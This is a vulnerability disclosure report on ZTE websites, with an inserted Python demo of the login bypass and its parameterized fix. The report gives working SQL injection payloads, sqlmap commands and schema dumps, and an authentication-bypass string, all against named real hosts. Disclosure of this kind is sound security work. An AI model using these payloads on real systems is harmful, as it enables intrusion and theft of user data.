
Vulnerability summary (24 followers)

Defect ID: wooyun-2013-046090

Title: ZTE # sub-site vulnerability bundle (SQL injection, information disclosure, directory traversal, universal password)

Affected vendor: ZTE Corporation (中兴通讯股份有限公司)

Author: Mr.leo

Submitted: 2013-12-16 11:54

Fix deadline: 2014-01-30 11:54

Public disclosure: 2014-01-30 11:54

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]



Vulnerability details

Disclosure status:

2013-12-16: Details sent to the vendor, awaiting vendor handling
2013-12-17: Vendor confirmed; details visible to the vendor only
2013-12-27: Details disclosed to core white hats and domain experts
2014-01-06: Details disclosed to regular white hats
2014-01-16: Details disclosed to intern white hats
2014-01-30: Details disclosed to the public

Brief description:

ZTE # sub-site vulnerability bundle (SQL injection, information disclosure, directory traversal, universal password)

Detailed description:

Site: http://mts.zte.com.cn, the ZTE supplier drawing download management system
POST http://mts.zte.com.cn/Mtsmap/CustomerLogin.aspx HTTP/1.1
Host: mts.zte.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://mts.zte.com.cn/Mtsmap/CustomerLogin.aspx
Cookie: ASP.NET_SessionId=akhsqnukmzb3t355ahzmft45
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 234
__EVENTTARGET=c_cmdLogin&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMjEyNDk5Njc4N2RkuzPnWOvmQMT6DJx%2Ffu3eSoFAM7g%3D&__EVENTVALIDATION=%2FwEWBALRva2YCAKKgYHMDwKJsvbvDgLO0aOGAe2ltmsT8z%2BTk0cp8O%2BsqQFUtzBM&c_txtUserPWD=123&c_txtUserPWD=123
The c_txtUserPWD parameter is not filtered, which results in an injection vulnerability.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: c_txtUserID
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: __EVENTTARGET=c_cmdLogin&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjEyN
Dk5Njc4N2RkuzPnWOvmQMT6DJx/fu3eSoFAM7g=&__EVENTVALIDATION=/wEWBALRva2YCAKKgYHMDw
KJsvbvDgLO0aOGAe2ltmsT8z+Tk0cp8O+sqQFUtzBM&c_txtUserID=123' AND 9008=(SELECT UPP
ER(XMLType(CHR(60)||CHR(58)||CHR(121)||CHR(111)||CHR(105)||CHR(58)||(SELECT (CAS
E WHEN (9008=9008) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(99)||CHR(101)||CH
R(108)||CHR(58)||CHR(62))) FROM DUAL) AND 'kBrd'='kBrd&c_txtUserPWD=123
---
[09:59:54] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
[09:59:54] [INFO] fetching current user
[09:59:54] [INFO] resumed: MTS
current user: 'MTS'
[09:59:54] [INFO] fetching current database
[09:59:54] [INFO] resumed: MTS
current schema (equivalent to database on Oracle): 'MTS'
[09:59:54] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[09:59:54] [INFO] fetching database (schema) names
[09:59:54] [INFO] the SQL query used returns 20 entries
[09:59:54] [INFO] resumed: AMP
[09:59:54] [INFO] resumed: CJQ
[09:59:54] [INFO] resumed: CTXSYS
[09:59:54] [INFO] resumed: DBSNMP
[09:59:54] [INFO] resumed: DMSYS
[09:59:54] [INFO] resumed: EXFSYS
[09:59:54] [INFO] resumed: HR
[09:59:54] [INFO] resumed: HRUSER
[09:59:54] [INFO] resumed: MDSYS
[09:59:54] [INFO] resumed: MTS
[09:59:54] [INFO] resumed: OLAPSYS
[09:59:54] [INFO] resumed: ORDSYS
[09:59:54] [INFO] resumed: OUTLN
[09:59:54] [INFO] resumed: SCOTT
[09:59:54] [INFO] resumed: SYS
[09:59:54] [INFO] resumed: SYSMAN
[09:59:54] [INFO] resumed: SYSTEM
[09:59:54] [INFO] resumed: TSMSYS
[09:59:54] [INFO] resumed: WMSYS
[09:59:54] [INFO] resumed: XDB
available databases [20]:
[*] AMP
[*] CJQ
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] HRUSER
[*] MDSYS
[*] MTS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
More than 300 tables:
Database: MTS
[310 tables]
User information disclosure: 250,000+ (25w+) records

123.png


A partial excerpt:

456.png


A universal password (authentication bypass) exists and gives access to the admin backend:
http://mts.zte.com.cn/Mtsmap/CustomerLogin.aspx
Username and password: ' or 1=1 or ''='
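The bypass above works because the login form fields are concatenated straight into the SQL string, so the quote in the input closes the literal and the `or 1=1` makes the WHERE clause always true. The following is an added example, not code from the report or from the ZTE application: it reproduces the flaw against a constructed in-memory SQLite table (the real MTS login table and its columns are not on the page; `app_user`, `user_id` and `user_pwd` are assumed names) and shows the parameterized version that closes the hole.

```python
import sqlite3

# Constructed stand-in for the login table; the real schema is not on the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE app_user (user_id TEXT, user_pwd TEXT)")
    conn.execute("INSERT INTO app_user VALUES ('supplier01', 'S3cret!')")
    conn.commit()
    return conn


def login_vulnerable(conn, user_id, user_pwd):
    # Mirrors the reported flaw: form values are spliced into the SQL text
    # unfiltered, so a quote in the input rewrites the query structure.
    sql = ("SELECT COUNT(*) FROM app_user WHERE user_id = '" + user_id
           + "' AND user_pwd = '" + user_pwd + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_fixed(conn, user_id, user_pwd):
    # Parameterized query: the driver passes the values as data, never as SQL,
    # so the same input is compared literally and matches no row.
    sql = "SELECT COUNT(*) FROM app_user WHERE user_id = ? AND user_pwd = ?"
    return conn.execute(sql, (user_id, user_pwd)).fetchone()[0] > 0


def demo():
    # The exact username/password value quoted in the report.
    bypass = "' or 1=1 or ''='"
    conn = make_db()
    return {
        "vulnerable_bypass": login_vulnerable(conn, bypass, bypass),  # True
        "fixed_bypass": login_fixed(conn, bypass, bypass),            # False
        "fixed_real_creds": login_fixed(conn, "supplier01", "S3cret!"),  # True
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The vulnerable query expands to `... WHERE user_id = '' or 1=1 or ''='' AND user_pwd = '' or 1=1 or ''=''`, which is true for every row; the fixed query returns no match. Storing passwords as salted hashes rather than plaintext, as this toy table does, is a separate fix the report does not cover.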

123123.png


Drawing downloads:

678.png


Supplier issue feedback can be viewed and new feedback tickets created:

4455.png


456456.png


Site: www.ztewelink.com, 深圳市中兴物联科技有限公司 (ZTE WeLink)
Another SQL injection; the database was not dumped.
sqlmap.py -u "http://www.ztewelink.com/Search.aspx?action=CN" --data "keyword=123&%E6%8F%90%E4%BA%A4=" -p "keyword" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: keyword
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: keyword=123'; WAITFOR DELAY '0:0:5';--&??=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: keyword=123' WAITFOR DELAY '0:0:5'--&??=
---
[10:18:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Site: mobsupport.zte.com.cn, ZTE ECC electronic collaborative commerce platform.
Multiple directory traversal (directory listing) issues exist; the vendor should check the entire site.

334455.png


135135.png


over

Proof of vulnerability:

Already demonstrated above.

Fix recommendations:

1# Filter all potentially affected parameters
2# Fix the universal password
3# Disable directory traversal
4# High Rank
5# First time looking at ZTE; is there a gift?

Copyright notice: please credit the source when reposting, Mr.leo@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2013-12-17 11:44

Vendor reply:

Thank you, Mr.leo, for your attention to our company's website security. The issue has been forwarded to the relevant department for handling. We will notify you of any progress on this issue as soon as possible. Thank you!

Latest status:

None yet